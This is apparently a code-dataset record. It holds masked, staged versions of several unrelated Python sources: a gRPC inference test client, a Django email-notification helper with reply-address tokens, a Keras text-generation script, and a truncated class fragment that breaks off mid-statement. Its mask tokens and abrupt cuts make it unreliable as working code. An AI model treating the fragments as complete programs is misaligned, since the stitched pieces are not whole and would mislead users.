"step-2": "<mask token>\n\n\ndef run(address):\n ths = []\n with grpc.insecure_channel(address) as channel:\n for i in range(1):\n th = threading.Thread(target=send, args=(channel,))\n ths.append(th)\n st = int(time.time())\n for th in ths:\n th.start()\n for th in ths:\n th.join()\n et = int(time.time())\n\n\ndef process_response(call_future):\n print(call_future.result())\n\n\ndef send(channel):\n stub = inference_service_pb2_grpc.InferenceServiceStub(channel)\n request = inference_service_pb2.InferenceMessage()\n request_data = dict()\n request_data['serviceId'] = 'xxxxxxxxx'\n request_data['applyId'] = ''\n request_data['caseid'] = uuid.uuid1().hex\n feature_data = dict()\n feature_data['fid1'] = 5.1\n feature_data['fid2'] = 6.2\n feature_data['fid3'] = 7.6\n request_data['featureData'] = feature_data\n request_data['sendToRemoteFeatureData'] = feature_data\n print(json.dumps(request_data, indent=4))\n request.body = json.dumps(request_data).encode(encoding='utf-8')\n print(stub.inference(request))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef run(address):\n ths = []\n with grpc.insecure_channel(address) as channel:\n for i in range(1):\n th = threading.Thread(target=send, args=(channel,))\n ths.append(th)\n st = int(time.time())\n for th in ths:\n th.start()\n for th in ths:\n th.join()\n et = int(time.time())\n\n\ndef process_response(call_future):\n print(call_future.result())\n\n\ndef send(channel):\n stub = inference_service_pb2_grpc.InferenceServiceStub(channel)\n request = inference_service_pb2.InferenceMessage()\n request_data = dict()\n request_data['serviceId'] = 'xxxxxxxxx'\n request_data['applyId'] = ''\n request_data['caseid'] = uuid.uuid1().hex\n feature_data = dict()\n feature_data['fid1'] = 5.1\n feature_data['fid2'] = 6.2\n feature_data['fid3'] = 7.6\n request_data['featureData'] = feature_data\n request_data['sendToRemoteFeatureData'] = feature_data\n print(json.dumps(request_data, indent=4))\n request.body = json.dumps(request_data).encode(encoding='utf-8')\n print(stub.inference(request))\n\n\nif __name__ == '__main__':\n run(sys.argv[1])\n",
"step-4": "import grpc\nimport time\nimport json\nimport sys\nimport uuid\nfrom arch.api.proto import inference_service_pb2\nfrom arch.api.proto import inference_service_pb2_grpc\nimport threading\n\n\ndef run(address):\n ths = []\n with grpc.insecure_channel(address) as channel:\n for i in range(1):\n th = threading.Thread(target=send, args=(channel,))\n ths.append(th)\n st = int(time.time())\n for th in ths:\n th.start()\n for th in ths:\n th.join()\n et = int(time.time())\n\n\ndef process_response(call_future):\n print(call_future.result())\n\n\ndef send(channel):\n stub = inference_service_pb2_grpc.InferenceServiceStub(channel)\n request = inference_service_pb2.InferenceMessage()\n request_data = dict()\n request_data['serviceId'] = 'xxxxxxxxx'\n request_data['applyId'] = ''\n request_data['caseid'] = uuid.uuid1().hex\n feature_data = dict()\n feature_data['fid1'] = 5.1\n feature_data['fid2'] = 6.2\n feature_data['fid3'] = 7.6\n request_data['featureData'] = feature_data\n request_data['sendToRemoteFeatureData'] = feature_data\n print(json.dumps(request_data, indent=4))\n request.body = json.dumps(request_data).encode(encoding='utf-8')\n print(stub.inference(request))\n\n\nif __name__ == '__main__':\n run(sys.argv[1])\n",
"step-5": "import grpc\nimport time\nimport json\nimport sys\nimport uuid\n\nfrom arch.api.proto import inference_service_pb2\nfrom arch.api.proto import inference_service_pb2_grpc\nimport threading\n\n\ndef run(address):\n ths = []\n with grpc.insecure_channel(address) as channel:\n for i in range(1):\n th = threading.Thread(target=send, args=(channel,))\n ths.append(th)\n st = int(time.time())\n for th in ths:\n th.start()\n for th in ths:\n th.join()\n et = int(time.time())\n\n\ndef process_response(call_future):\n print(call_future.result())\n\n\ndef send(channel):\n stub = inference_service_pb2_grpc.InferenceServiceStub(channel)\n request = inference_service_pb2.InferenceMessage()\n request_data = dict()\n request_data['serviceId'] = 'xxxxxxxxx'\n request_data['applyId'] = ''\n # request_data['modelId'] = 'arbiter-10000#guest-10000#host-10000#model' # You can specify the model id this way\n # request_data['modelVersion'] = 'acd3e1807a1211e9969aacde48001122' # You can specify the model version this way\n request_data['caseid'] = uuid.uuid1().hex\n\n feature_data = dict()\n feature_data['fid1'] = 5.1\n feature_data['fid2'] = 6.2\n feature_data['fid3'] = 7.6\n request_data['featureData'] = feature_data\n request_data['sendToRemoteFeatureData'] = feature_data\n\n print(json.dumps(request_data, indent=4))\n\n request.body = json.dumps(request_data).encode(encoding='utf-8')\n print(stub.inference(request))\n\n\nif __name__ == '__main__':\n run(sys.argv[1])\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
import hashlib
from django.conf import settings
from django.core import mail
from django.core.mail import EmailMultiAlternatives
from django.template.loader import render_to_string
from django.utils.crypto import get_random_string
def hexdigest_sha256(*args):
    """Return the SHA-256 hex digest of the UTF-8 concatenation of
    ``str(arg)`` for every positional argument, in order."""
    digest = hashlib.sha256()
    for item in args:
        digest.update(str(item).encode('utf-8'))
    return digest.hexdigest()
def get_reply_addr(message_id, dest):
    """Build the single-use reply address for *dest*, or [] when the
    deployment has no REPLY_EMAIL configured.

    The local part packs the recipient's email token, the message id and a
    12-character digest so an inbound reply can be routed and verified.
    """
    if not hasattr(settings, 'REPLY_EMAIL'):
        return []
    reply = settings.REPLY_EMAIL
    at = reply.find('@')
    local_part, domain = reply[:at], reply[at:]  # domain keeps the leading '@'
    key = hexdigest_sha256(settings.SECRET_KEY, message_id, dest.pk)[:12]
    return ['%s+%s%s%s%s' % (local_part, dest.profile.email_token,
                             message_id, key, domain)]
def generate_message_token():
    """Return a 60-character random token over lowercase letters and digits."""
    alphabet = 'abcdefghijklmnopqrstuvwxyz0123456789'
    return get_random_string(length=60, allowed_chars=alphabet)
def notify_by_email(template, data, subject, sender, dests, message_id, ref=None):
    """Render the given email template and send it to every recipient in
    *dests* as a multipart (text + HTML) message.

    NOTE: mutates *data* in place (adds 'answering': True) when the
    deployment is configured for reply handling.

    Args:
        template: base name under conversations/emails/ (.txt and .html).
        data: template context dict (mutated, see note above).
        subject: email subject line.
        sender: user whose name appears in the From header.
        dests: iterable of recipients; entries without an email are skipped.
        message_id: token used for the Message-ID header and reply routing.
        ref: optional token of a previous message, emitted as a References
            header so clients thread the conversation.
    """
    if hasattr(settings, 'REPLY_EMAIL') and hasattr(settings, 'REPLY_KEY'):
        data.update({'answering': True})
    text_message = render_to_string('conversations/emails/%s.txt' % template, data)
    html_message = render_to_string('conversations/emails/%s.html' % template, data)
    from_email = '{name} <{email}>'.format(
        name=sender.get_full_name() or sender.username,
        email=settings.DEFAULT_FROM_EMAIL)

    # Build the threading headers.
    headers = {'Message-ID': "<%s.%s>" % (message_id, settings.DEFAULT_FROM_EMAIL)}
    if ref:
        # This email references a previous one.
        headers.update({
            'References': '<%s.%s>' % (ref, settings.DEFAULT_FROM_EMAIL),
        })

    # Collect one (subject, bodies, from, to, reply-to, headers) tuple per
    # recipient; each gets its own personalised reply address.
    mails = []
    for dest in dests:
        if not dest.email:
            continue
        reply_to = get_reply_addr(message_id, dest)
        mails += [(subject, (text_message, html_message), from_email, [dest.email], reply_to, headers)]

    # Materialise the messages, then send them on a single connection.
    # (The loop variables deliberately rebind the names above.)
    messages = []
    for subject, message, from_email, dest_emails, reply_to, headers in mails:
        text_message, html_message = message
        msg = EmailMultiAlternatives(subject, text_message, from_email, dest_emails, reply_to=reply_to,
                                     headers=headers)
        msg.attach_alternative(html_message, 'text/html')
        messages += [msg]

    with mail.get_connection() as connection:
        connection.send_messages(messages)
|
normal
|
{
"blob_id": "a35004e2b306ba1a8649ce66a1612f63a2b6bf39",
"index": 2673,
"step-1": "<mask token>\n\n\ndef hexdigest_sha256(*args):\n r = hashlib.sha256()\n for arg in args:\n r.update(str(arg).encode('utf-8'))\n return r.hexdigest()\n\n\n<mask token>\n\n\ndef notify_by_email(template, data, subject, sender, dests, message_id, ref\n =None):\n if hasattr(settings, 'REPLY_EMAIL') and hasattr(settings, 'REPLY_KEY'):\n data.update({'answering': True})\n text_message = render_to_string('conversations/emails/%s.txt' %\n template, data)\n html_message = render_to_string('conversations/emails/%s.html' %\n template, data)\n from_email = '{name} <{email}>'.format(name=sender.get_full_name() or\n sender.username, email=settings.DEFAULT_FROM_EMAIL)\n headers = {'Message-ID': '<%s.%s>' % (message_id, settings.\n DEFAULT_FROM_EMAIL)}\n if ref:\n headers.update({'References': '<%s.%s>' % (ref, settings.\n DEFAULT_FROM_EMAIL)})\n mails = []\n for dest in dests:\n if not dest.email:\n continue\n reply_to = get_reply_addr(message_id, dest)\n mails += [(subject, (text_message, html_message), from_email, [dest\n .email], reply_to, headers)]\n messages = []\n for subject, message, from_email, dest_emails, reply_to, headers in mails:\n text_message, html_message = message\n msg = EmailMultiAlternatives(subject, text_message, from_email,\n dest_emails, reply_to=reply_to, headers=headers)\n msg.attach_alternative(html_message, 'text/html')\n messages += [msg]\n with mail.get_connection() as connection:\n connection.send_messages(messages)\n",
"step-2": "<mask token>\n\n\ndef hexdigest_sha256(*args):\n r = hashlib.sha256()\n for arg in args:\n r.update(str(arg).encode('utf-8'))\n return r.hexdigest()\n\n\n<mask token>\n\n\ndef generate_message_token():\n return get_random_string(length=60, allowed_chars=\n 'abcdefghijklmnopqrstuvwxyz0123456789')\n\n\ndef notify_by_email(template, data, subject, sender, dests, message_id, ref\n =None):\n if hasattr(settings, 'REPLY_EMAIL') and hasattr(settings, 'REPLY_KEY'):\n data.update({'answering': True})\n text_message = render_to_string('conversations/emails/%s.txt' %\n template, data)\n html_message = render_to_string('conversations/emails/%s.html' %\n template, data)\n from_email = '{name} <{email}>'.format(name=sender.get_full_name() or\n sender.username, email=settings.DEFAULT_FROM_EMAIL)\n headers = {'Message-ID': '<%s.%s>' % (message_id, settings.\n DEFAULT_FROM_EMAIL)}\n if ref:\n headers.update({'References': '<%s.%s>' % (ref, settings.\n DEFAULT_FROM_EMAIL)})\n mails = []\n for dest in dests:\n if not dest.email:\n continue\n reply_to = get_reply_addr(message_id, dest)\n mails += [(subject, (text_message, html_message), from_email, [dest\n .email], reply_to, headers)]\n messages = []\n for subject, message, from_email, dest_emails, reply_to, headers in mails:\n text_message, html_message = message\n msg = EmailMultiAlternatives(subject, text_message, from_email,\n dest_emails, reply_to=reply_to, headers=headers)\n msg.attach_alternative(html_message, 'text/html')\n messages += [msg]\n with mail.get_connection() as connection:\n connection.send_messages(messages)\n",
"step-3": "<mask token>\n\n\ndef hexdigest_sha256(*args):\n r = hashlib.sha256()\n for arg in args:\n r.update(str(arg).encode('utf-8'))\n return r.hexdigest()\n\n\ndef get_reply_addr(message_id, dest):\n if not hasattr(settings, 'REPLY_EMAIL'):\n return []\n addr = settings.REPLY_EMAIL\n pos = addr.find('@')\n name = addr[:pos]\n domain = addr[pos:]\n key = hexdigest_sha256(settings.SECRET_KEY, message_id, dest.pk)[0:12]\n return ['%s+%s%s%s%s' % (name, dest.profile.email_token, message_id,\n key, domain)]\n\n\ndef generate_message_token():\n return get_random_string(length=60, allowed_chars=\n 'abcdefghijklmnopqrstuvwxyz0123456789')\n\n\ndef notify_by_email(template, data, subject, sender, dests, message_id, ref\n =None):\n if hasattr(settings, 'REPLY_EMAIL') and hasattr(settings, 'REPLY_KEY'):\n data.update({'answering': True})\n text_message = render_to_string('conversations/emails/%s.txt' %\n template, data)\n html_message = render_to_string('conversations/emails/%s.html' %\n template, data)\n from_email = '{name} <{email}>'.format(name=sender.get_full_name() or\n sender.username, email=settings.DEFAULT_FROM_EMAIL)\n headers = {'Message-ID': '<%s.%s>' % (message_id, settings.\n DEFAULT_FROM_EMAIL)}\n if ref:\n headers.update({'References': '<%s.%s>' % (ref, settings.\n DEFAULT_FROM_EMAIL)})\n mails = []\n for dest in dests:\n if not dest.email:\n continue\n reply_to = get_reply_addr(message_id, dest)\n mails += [(subject, (text_message, html_message), from_email, [dest\n .email], reply_to, headers)]\n messages = []\n for subject, message, from_email, dest_emails, reply_to, headers in mails:\n text_message, html_message = message\n msg = EmailMultiAlternatives(subject, text_message, from_email,\n dest_emails, reply_to=reply_to, headers=headers)\n msg.attach_alternative(html_message, 'text/html')\n messages += [msg]\n with mail.get_connection() as connection:\n connection.send_messages(messages)\n",
"step-4": "import hashlib\nfrom django.conf import settings\nfrom django.core import mail\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.template.loader import render_to_string\nfrom django.utils.crypto import get_random_string\n\n\ndef hexdigest_sha256(*args):\n r = hashlib.sha256()\n for arg in args:\n r.update(str(arg).encode('utf-8'))\n return r.hexdigest()\n\n\ndef get_reply_addr(message_id, dest):\n if not hasattr(settings, 'REPLY_EMAIL'):\n return []\n addr = settings.REPLY_EMAIL\n pos = addr.find('@')\n name = addr[:pos]\n domain = addr[pos:]\n key = hexdigest_sha256(settings.SECRET_KEY, message_id, dest.pk)[0:12]\n return ['%s+%s%s%s%s' % (name, dest.profile.email_token, message_id,\n key, domain)]\n\n\ndef generate_message_token():\n return get_random_string(length=60, allowed_chars=\n 'abcdefghijklmnopqrstuvwxyz0123456789')\n\n\ndef notify_by_email(template, data, subject, sender, dests, message_id, ref\n =None):\n if hasattr(settings, 'REPLY_EMAIL') and hasattr(settings, 'REPLY_KEY'):\n data.update({'answering': True})\n text_message = render_to_string('conversations/emails/%s.txt' %\n template, data)\n html_message = render_to_string('conversations/emails/%s.html' %\n template, data)\n from_email = '{name} <{email}>'.format(name=sender.get_full_name() or\n sender.username, email=settings.DEFAULT_FROM_EMAIL)\n headers = {'Message-ID': '<%s.%s>' % (message_id, settings.\n DEFAULT_FROM_EMAIL)}\n if ref:\n headers.update({'References': '<%s.%s>' % (ref, settings.\n DEFAULT_FROM_EMAIL)})\n mails = []\n for dest in dests:\n if not dest.email:\n continue\n reply_to = get_reply_addr(message_id, dest)\n mails += [(subject, (text_message, html_message), from_email, [dest\n .email], reply_to, headers)]\n messages = []\n for subject, message, from_email, dest_emails, reply_to, headers in mails:\n text_message, html_message = message\n msg = EmailMultiAlternatives(subject, text_message, from_email,\n dest_emails, reply_to=reply_to, 
headers=headers)\n msg.attach_alternative(html_message, 'text/html')\n messages += [msg]\n with mail.get_connection() as connection:\n connection.send_messages(messages)\n",
"step-5": "import hashlib\n\nfrom django.conf import settings\nfrom django.core import mail\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.template.loader import render_to_string\nfrom django.utils.crypto import get_random_string\n\n\ndef hexdigest_sha256(*args):\n\n r = hashlib.sha256()\n for arg in args:\n r.update(str(arg).encode('utf-8'))\n\n return r.hexdigest()\n\n\ndef get_reply_addr(message_id, dest):\n\n if not hasattr(settings, 'REPLY_EMAIL'):\n return []\n\n addr = settings.REPLY_EMAIL\n pos = addr.find('@')\n name = addr[:pos]\n domain = addr[pos:]\n key = hexdigest_sha256(settings.SECRET_KEY, message_id, dest.pk)[0:12]\n\n return ['%s+%s%s%s%s' % (name, dest.profile.email_token, message_id, key, domain)]\n\n\ndef generate_message_token():\n return get_random_string(length=60, allowed_chars='abcdefghijklmnopqrstuvwxyz0123456789')\n\n\ndef notify_by_email(template, data, subject, sender, dests, message_id, ref=None):\n\n if hasattr(settings, 'REPLY_EMAIL') and hasattr(settings, 'REPLY_KEY'):\n data.update({'answering': True})\n\n text_message = render_to_string('conversations/emails/%s.txt' % template, data)\n html_message = render_to_string('conversations/emails/%s.html' % template, data)\n\n from_email = '{name} <{email}>'.format(\n name=sender.get_full_name() or sender.username,\n email=settings.DEFAULT_FROM_EMAIL)\n\n # Generating headers\n headers = {'Message-ID': \"<%s.%s>\" % (message_id, settings.DEFAULT_FROM_EMAIL)}\n if ref:\n # This email reference a previous one\n headers.update({\n 'References': '<%s.%s>' % (ref, settings.DEFAULT_FROM_EMAIL),\n })\n\n mails = []\n for dest in dests:\n if not dest.email:\n continue\n\n reply_to = get_reply_addr(message_id, dest)\n\n mails += [(subject, (text_message, html_message), from_email, [dest.email], reply_to, headers)]\n\n messages = []\n for subject, message, from_email, dest_emails, reply_to, headers in mails:\n text_message, html_message = message\n msg = 
EmailMultiAlternatives(subject, text_message, from_email, dest_emails, reply_to=reply_to,\n headers=headers)\n msg.attach_alternative(html_message, 'text/html')\n messages += [msg]\n with mail.get_connection() as connection:\n connection.send_messages(messages)\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
def main():
print('Loading model...')
model, charset = load_model(MODEL_NAME)
print(charset)
seed_text = input('Enter a String: ').strip()
print()
generate_script(seed_text, model, charset)
def generate_script(seed_text, model, charset):
sys.stdout.write(seed_text)
sys.stdout.flush()
next_char = None
should_stop = False
while not should_stop:
prev_char = next_char
next_char = sample(model, seed_text, charset, temp=0.2)
sys.stdout.write(next_char)
sys.stdout.flush()
if prev_char == '\n' and prev_char == next_char:
should_stop = True
def sample(model, string, charset, temp=1.0):
inputs = [string_one_hot(string, charset)]
inputs = pad_sequences(inputs, padding='post', maxlen=64)
preds = model.predict(inputs)[0]
return charset[sample_preds(preds, temp)]
def sample_preds(results, temperature=1.0):
if temperature <= 0.0:
return np.argmax(results)
probs = np.exp(np.log(results) / temperature)
probs /= np.sum(probs)
return np.random.choice(len(results), p=probs)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main():
print('Loading model...')
model, charset = load_model(MODEL_NAME)
print(charset)
seed_text = input('Enter a String: ').strip()
print()
generate_script(seed_text, model, charset)
def generate_script(seed_text, model, charset):
sys.stdout.write(seed_text)
sys.stdout.flush()
next_char = None
should_stop = False
while not should_stop:
prev_char = next_char
next_char = sample(model, seed_text, charset, temp=0.2)
sys.stdout.write(next_char)
sys.stdout.flush()
if prev_char == '\n' and prev_char == next_char:
should_stop = True
def sample(model, string, charset, temp=1.0):
inputs = [string_one_hot(string, charset)]
inputs = pad_sequences(inputs, padding='post', maxlen=64)
preds = model.predict(inputs)[0]
return charset[sample_preds(preds, temp)]
def sample_preds(results, temperature=1.0):
if temperature <= 0.0:
return np.argmax(results)
probs = np.exp(np.log(results) / temperature)
probs /= np.sum(probs)
return np.random.choice(len(results), p=probs)
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
os.environ['KERAS_BACKEND'] = 'tensorflow'
<|reserved_special_token_0|>
MODEL_NAME = 'script_gen_demo_model'
def main():
print('Loading model...')
model, charset = load_model(MODEL_NAME)
print(charset)
seed_text = input('Enter a String: ').strip()
print()
generate_script(seed_text, model, charset)
def generate_script(seed_text, model, charset):
sys.stdout.write(seed_text)
sys.stdout.flush()
next_char = None
should_stop = False
while not should_stop:
prev_char = next_char
next_char = sample(model, seed_text, charset, temp=0.2)
sys.stdout.write(next_char)
sys.stdout.flush()
if prev_char == '\n' and prev_char == next_char:
should_stop = True
def sample(model, string, charset, temp=1.0):
inputs = [string_one_hot(string, charset)]
inputs = pad_sequences(inputs, padding='post', maxlen=64)
preds = model.predict(inputs)[0]
return charset[sample_preds(preds, temp)]
def sample_preds(results, temperature=1.0):
if temperature <= 0.0:
return np.argmax(results)
probs = np.exp(np.log(results) / temperature)
probs /= np.sum(probs)
return np.random.choice(len(results), p=probs)
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
os.environ['KERAS_BACKEND'] = 'tensorflow'
import numpy as np
import sys
from util import load_model
from keras.preprocessing.text import hashing_trick
from keras.preprocessing.sequence import pad_sequences
from southpark.southpark_generative import string_one_hot, char_one_hot
MODEL_NAME = 'script_gen_demo_model'
def main():
print('Loading model...')
model, charset = load_model(MODEL_NAME)
print(charset)
seed_text = input('Enter a String: ').strip()
print()
generate_script(seed_text, model, charset)
def generate_script(seed_text, model, charset):
sys.stdout.write(seed_text)
sys.stdout.flush()
next_char = None
should_stop = False
while not should_stop:
prev_char = next_char
next_char = sample(model, seed_text, charset, temp=0.2)
sys.stdout.write(next_char)
sys.stdout.flush()
if prev_char == '\n' and prev_char == next_char:
should_stop = True
def sample(model, string, charset, temp=1.0):
inputs = [string_one_hot(string, charset)]
inputs = pad_sequences(inputs, padding='post', maxlen=64)
preds = model.predict(inputs)[0]
return charset[sample_preds(preds, temp)]
def sample_preds(results, temperature=1.0):
if temperature <= 0.0:
return np.argmax(results)
probs = np.exp(np.log(results) / temperature)
probs /= np.sum(probs)
return np.random.choice(len(results), p=probs)
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
#!/usr/bin/python3
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # or any {'0', '1', '2'
os.environ['KERAS_BACKEND'] = 'tensorflow'
import numpy as np
import sys
from util import load_model
from keras.preprocessing.text import hashing_trick
from keras.preprocessing.sequence import pad_sequences
from southpark.southpark_generative import string_one_hot, char_one_hot
MODEL_NAME = "script_gen_demo_model"
def main():
print("Loading model...")
model, charset = load_model(MODEL_NAME)
print(charset)
seed_text = input("Enter a String: ").strip()
print()
generate_script(seed_text, model, charset)
def generate_script(seed_text, model, charset):
sys.stdout.write(seed_text)
sys.stdout.flush()
next_char = None
should_stop = False
while not should_stop:
prev_char = next_char
next_char = sample(model, seed_text, charset, temp = 0.2)
sys.stdout.write(next_char)
sys.stdout.flush()
if prev_char == '\n' and prev_char == next_char:
should_stop = True
def sample(model, string, charset, temp = 1.0):
inputs = [string_one_hot(string, charset)]
inputs = pad_sequences(inputs, padding = 'post', maxlen = 64)
preds = model.predict(inputs)[0]
return charset[sample_preds(preds, temp)]
def sample_preds(results, temperature = 1.0):
# helper function to sample an index from a probability array
if temperature <= 0.0:
return np.argmax(results)
#num_choices = results.shape[0] # (batch, outputs)
probs = np.exp(np.log(results) / temperature)
probs /= np.sum(probs)
return np.random.choice(len(results), p = probs)
#preds = np.asarray(preds).astype('float64')
#preds = np.log(preds) / temperature
#exp_preds = np.exp(preds)
#preds = exp_preds / np.sum(exp_preds)
#probas = np.random.multinomial(1, preds, 1)
#
#print(probas)
#return np.argmax(probas)
if __name__ == "__main__":
main()
|
flexible
|
{
"blob_id": "ed7b29a4d7f3a48884434373418c3528f2f397ac",
"index": 271,
"step-1": "<mask token>\n\n\ndef main():\n print('Loading model...')\n model, charset = load_model(MODEL_NAME)\n print(charset)\n seed_text = input('Enter a String: ').strip()\n print()\n generate_script(seed_text, model, charset)\n\n\ndef generate_script(seed_text, model, charset):\n sys.stdout.write(seed_text)\n sys.stdout.flush()\n next_char = None\n should_stop = False\n while not should_stop:\n prev_char = next_char\n next_char = sample(model, seed_text, charset, temp=0.2)\n sys.stdout.write(next_char)\n sys.stdout.flush()\n if prev_char == '\\n' and prev_char == next_char:\n should_stop = True\n\n\ndef sample(model, string, charset, temp=1.0):\n inputs = [string_one_hot(string, charset)]\n inputs = pad_sequences(inputs, padding='post', maxlen=64)\n preds = model.predict(inputs)[0]\n return charset[sample_preds(preds, temp)]\n\n\ndef sample_preds(results, temperature=1.0):\n if temperature <= 0.0:\n return np.argmax(results)\n probs = np.exp(np.log(results) / temperature)\n probs /= np.sum(probs)\n return np.random.choice(len(results), p=probs)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n print('Loading model...')\n model, charset = load_model(MODEL_NAME)\n print(charset)\n seed_text = input('Enter a String: ').strip()\n print()\n generate_script(seed_text, model, charset)\n\n\ndef generate_script(seed_text, model, charset):\n sys.stdout.write(seed_text)\n sys.stdout.flush()\n next_char = None\n should_stop = False\n while not should_stop:\n prev_char = next_char\n next_char = sample(model, seed_text, charset, temp=0.2)\n sys.stdout.write(next_char)\n sys.stdout.flush()\n if prev_char == '\\n' and prev_char == next_char:\n should_stop = True\n\n\ndef sample(model, string, charset, temp=1.0):\n inputs = [string_one_hot(string, charset)]\n inputs = pad_sequences(inputs, padding='post', maxlen=64)\n preds = model.predict(inputs)[0]\n return charset[sample_preds(preds, temp)]\n\n\ndef sample_preds(results, temperature=1.0):\n if temperature <= 0.0:\n return np.argmax(results)\n probs = np.exp(np.log(results) / temperature)\n probs /= np.sum(probs)\n return np.random.choice(len(results), p=probs)\n\n\nif __name__ == '__main__':\n main()\n",
"step-3": "<mask token>\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\nos.environ['KERAS_BACKEND'] = 'tensorflow'\n<mask token>\nMODEL_NAME = 'script_gen_demo_model'\n\n\ndef main():\n print('Loading model...')\n model, charset = load_model(MODEL_NAME)\n print(charset)\n seed_text = input('Enter a String: ').strip()\n print()\n generate_script(seed_text, model, charset)\n\n\ndef generate_script(seed_text, model, charset):\n sys.stdout.write(seed_text)\n sys.stdout.flush()\n next_char = None\n should_stop = False\n while not should_stop:\n prev_char = next_char\n next_char = sample(model, seed_text, charset, temp=0.2)\n sys.stdout.write(next_char)\n sys.stdout.flush()\n if prev_char == '\\n' and prev_char == next_char:\n should_stop = True\n\n\ndef sample(model, string, charset, temp=1.0):\n inputs = [string_one_hot(string, charset)]\n inputs = pad_sequences(inputs, padding='post', maxlen=64)\n preds = model.predict(inputs)[0]\n return charset[sample_preds(preds, temp)]\n\n\ndef sample_preds(results, temperature=1.0):\n if temperature <= 0.0:\n return np.argmax(results)\n probs = np.exp(np.log(results) / temperature)\n probs /= np.sum(probs)\n return np.random.choice(len(results), p=probs)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\nos.environ['KERAS_BACKEND'] = 'tensorflow'\nimport numpy as np\nimport sys\nfrom util import load_model\nfrom keras.preprocessing.text import hashing_trick\nfrom keras.preprocessing.sequence import pad_sequences\nfrom southpark.southpark_generative import string_one_hot, char_one_hot\nMODEL_NAME = 'script_gen_demo_model'\n\n\ndef main():\n print('Loading model...')\n model, charset = load_model(MODEL_NAME)\n print(charset)\n seed_text = input('Enter a String: ').strip()\n print()\n generate_script(seed_text, model, charset)\n\n\ndef generate_script(seed_text, model, charset):\n sys.stdout.write(seed_text)\n sys.stdout.flush()\n next_char = None\n should_stop = False\n while not should_stop:\n prev_char = next_char\n next_char = sample(model, seed_text, charset, temp=0.2)\n sys.stdout.write(next_char)\n sys.stdout.flush()\n if prev_char == '\\n' and prev_char == next_char:\n should_stop = True\n\n\ndef sample(model, string, charset, temp=1.0):\n inputs = [string_one_hot(string, charset)]\n inputs = pad_sequences(inputs, padding='post', maxlen=64)\n preds = model.predict(inputs)[0]\n return charset[sample_preds(preds, temp)]\n\n\ndef sample_preds(results, temperature=1.0):\n if temperature <= 0.0:\n return np.argmax(results)\n probs = np.exp(np.log(results) / temperature)\n probs /= np.sum(probs)\n return np.random.choice(len(results), p=probs)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "#!/usr/bin/python3\n\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # or any {'0', '1', '2'\nos.environ['KERAS_BACKEND'] = 'tensorflow'\n\nimport numpy as np\nimport sys\n\nfrom util import load_model\nfrom keras.preprocessing.text import hashing_trick\nfrom keras.preprocessing.sequence import pad_sequences \n\nfrom southpark.southpark_generative import string_one_hot, char_one_hot\n\n\nMODEL_NAME = \"script_gen_demo_model\"\n\ndef main():\n print(\"Loading model...\") \n model, charset = load_model(MODEL_NAME)\n \n print(charset)\n\n seed_text = input(\"Enter a String: \").strip()\n print()\n generate_script(seed_text, model, charset)\n\ndef generate_script(seed_text, model, charset):\n \n sys.stdout.write(seed_text)\n sys.stdout.flush()\n next_char = None\n should_stop = False\n while not should_stop:\n prev_char = next_char\n next_char = sample(model, seed_text, charset, temp = 0.2)\n \n sys.stdout.write(next_char)\n sys.stdout.flush()\n \n if prev_char == '\\n' and prev_char == next_char:\n should_stop = True\n\n \ndef sample(model, string, charset, temp = 1.0):\n inputs = [string_one_hot(string, charset)]\n inputs = pad_sequences(inputs, padding = 'post', maxlen = 64)\n preds = model.predict(inputs)[0]\n \n return charset[sample_preds(preds, temp)]\n\n\ndef sample_preds(results, temperature = 1.0):\n # helper function to sample an index from a probability array\n\n if temperature <= 0.0:\n return np.argmax(results)\n \n #num_choices = results.shape[0] # (batch, outputs)\n probs = np.exp(np.log(results) / temperature)\n probs /= np.sum(probs)\n return np.random.choice(len(results), p = probs)\n\n\n #preds = np.asarray(preds).astype('float64')\n #preds = np.log(preds) / temperature\n #exp_preds = np.exp(preds)\n #preds = exp_preds / np.sum(exp_preds)\n #probas = np.random.multinomial(1, preds, 1)\n #\n #print(probas)\n\n #return np.argmax(probas)\n\n\n\n\nif __name__ == \"__main__\":\n main()\n\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
class Zouts:
<|reserved_special_token_0|>
def search(self, StN, ZN, Motion):
for elem in self.elements:
print('elem:')
print(str(type(elem.StN)) + str(type(StN)))
print(elem.StN + '->' + StN + ':' + str(elem.StN == StN))
print(elem.Motion + '->' + ':' + str(elem.Motion == Motion))
if elem.StN == StN and elem.ZN == ZN and elem.Motion == Motion:
print('match')
return elem
print('not match')
return None
def add(self, zout):
self.elements.append(zout)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Zout:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class Zouts:
def __init__(self):
self.elements = []
def search(self, StN, ZN, Motion):
for elem in self.elements:
print('elem:')
print(str(type(elem.StN)) + str(type(StN)))
print(elem.StN + '->' + StN + ':' + str(elem.StN == StN))
print(elem.Motion + '->' + ':' + str(elem.Motion == Motion))
if elem.StN == StN and elem.ZN == ZN and elem.Motion == Motion:
print('match')
return elem
print('not match')
return None
def add(self, zout):
self.elements.append(zout)
def display(self):
for elem in self.elements:
print(elem.Var)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Zout:
<|reserved_special_token_0|>
def tozout(self, aline):
"""transform station statement to Cylinder Outputs struct"""
pattern = re.compile(
